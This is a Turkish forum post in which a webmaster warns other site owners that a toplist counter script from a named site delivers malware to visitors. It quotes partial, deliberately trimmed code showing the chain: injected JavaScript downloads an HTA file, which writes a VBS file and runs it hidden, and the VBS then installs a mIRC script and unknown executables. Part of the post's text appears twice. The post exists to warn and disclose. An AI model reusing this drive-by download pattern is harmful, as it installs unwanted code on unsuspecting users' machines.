Arkadaşlar bana bir kaç kez ziyaretçilerden şikayet geldi ama ben farketmedim bu sabah siteme girdiğimde farkettim ve araştırdımki bazı uyanıklar toplist php lerinden hta ile vbs yollayarak bilgisayarlara program kurdurtuyor pek farkına varılmıyor bu topliste ekliyseniz hemen toplistten sitenizi kaldırın!
işte kanıtı(bu arada genelde geceleri kod konuyor gündüzleri belli olmasın diye kaldırılıyor)
bu şerefsizliği yapan site www.yeniliste.net
Sitemize eklediğimiz toplist kodunun için js ile http://www.YeniListe.net/sayac.php?site=2282&ikon=4 sayfasını çektirtiyordum işte sayfanın sayac.js sinden gelen kod (deepfreeze li bi makinada bu sayfaya tıklayabilirsiniz)
tr.hta yı bilgisayarınız yediği anda tr.hta da bulunan kodlar
ve ardından bilgisayara yüklenen ana.vbs
Ve kaçak script bilgisayarınıza kuruluyor bu yetmezmiş gibi birde sözde kameralı chat mirc script yükleniyor ve içindede bazı alakasız exe dosyalar buldum ve araştırıyorum.
Bu insanlar hakkıyla kazanmak varken haksız yollardan güç kazanmaya çalışan sürüngen insanlar bu tip aldatmacalara gelmek sinir bozuyor bence yeniliste.net'in toplistine üye iseniz hemen sitenizden kaldırın.Neyseki makinam deepfreeze li.Bu konu ile ilgili zarar görenler savcılığa başvurabilirler.
iyi çalışmalar Kodların bazı bölümlerini kaldırdım diğer lamerlerin işine yaramasın diye
işte kanıtı(bu arada genelde geceleri kod konuyor gündüzleri belli olmasın diye kaldırılıyor)
bu şerefsizliği yapan site www.yeniliste.net
Sitemize eklediğimiz toplist kodunun için js ile http://www.YeniListe.net/sayac.php?site=2282&ikon=4 sayfasını çektirtiyordum işte sayfanın sayac.js sinden gelen kod (deepfreeze li bi makinada bu sayfaya tıklayabilirsiniz)
PHP:
var objtagobj = document.createElement('object');
obj_msxml2.open('GET', 'http://www.yeniliste.net/tr.hta', false);
...
...
s.ShellExecute(fn);
tr.hta yı bilgisayarınız yediği anda tr.hta da bulunan kodlar
PHP:
<HTML>
<HEAD>
<TITLE></TITLE>
<HTA:APPLICATION ID="pASSrAPER"
APPLICATIONNAME="ujust***jackedfoo"
BORDER="none"
BORDERSTYLE="normal"
WINDOWSTATE="minimize"/>
<script LANGUAGE="VBScript">
...
...
...
TSO.write "BinaryStream.Open" & vbcrlf
...
...
..
TSO.write "Set FSO = Nothing" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\ana.vbs", 0, false
</SCRIPT>
<script>
window.close()
</script>
</HEAD>
</html>
ve ardından bilgisayara yüklenen ana.vbs
PHP:
Set FSO = CreateObject("Scripting.FileSystemObject")
...
...
...
...
....
Set FSO = Nothing
Ve kaçak script bilgisayarınıza kuruluyor bu yetmezmiş gibi birde sözde kameralı chat mirc script yükleniyor ve içindede bazı alakasız exe dosyalar buldum ve araştırıyorum.
Bu insanlar hakkıyla kazanmak varken haksız yollardan güç kazanmaya çalışan sürüngen insanlar bu tip aldatmacalara gelmek sinir bozuyor bence yeniliste.net'in toplistine üye iseniz hemen sitenizden kaldırın.Neyseki makinam deepfreeze li.Bu konu ile ilgili zarar görenler savcılığa başvurabilirler.
iyi çalışmalar Kodların bazı bölümlerini kaldırdım diğer lamerlerin işine yaramasın diye